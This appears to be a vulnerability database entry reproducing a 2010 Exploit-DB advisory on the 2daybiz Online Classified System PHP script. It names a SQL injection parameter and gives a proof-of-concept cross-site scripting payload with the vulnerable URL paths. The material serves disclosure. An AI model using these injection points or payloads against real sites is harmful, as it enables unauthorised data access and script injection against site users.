2daybiz online classified system SQLi AND XSS Vulnerability

vendor:

Online Classified System

by:

Sid3^effects aKa HaRi

8,8

CVSS

HIGH

SQL Injection and Cross-Site Scripting (XSS)

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: Online Classified System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

2daybiz online classified system SQLi AND XSS Vulnerability

2daybiz online classified system allows users to post new ads, for which a predefined amount can be charged. The SQL Injection vulnerability can be exploited by sending malicious SQL queries to the application, while the XSS vulnerability can be exploited by sending malicious JavaScript code to the application.

Mitigation:

Input validation and output encoding should be used to prevent SQL Injection and XSS attacks.

Source

Exploit-DB raw data:

Name : 2daybiz online classified system SQLi AND XSS Vulnerability
Date : june, 16 2010
Vendor url :http://www.2daybiz.com/online_classified_script.html
Critical Level 	: HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
DESCRIPTION:
2daybiz online classified system allows you to start a fully automated classified ads site that includes essential features present in major classifieds sites. Our powerful script written in PHP allows your users to post new ads, for which you can charge a predefined amount. Billing is handled automatically and seamlessly through many of the popular payment gateways. Our classified ads software is fast, simple and fully customized through our built-in editor.

#######################################################################################################
Xploit: SQLI Vulnerability 

DEMO URL : http://[site]/products/orkutclone/view_photo.php?page=3&alb=[SQLI]
###############################################################################################################
Xploit: XSS Vulnerability 

Attack Pattern: '"--><script>alert(0x000872)</script>
DEMO URL :http://[site]/products/classified/headersearch.php?sid=[XSS]
###############################################################################################################
# 0day no more 
# Sid3^effects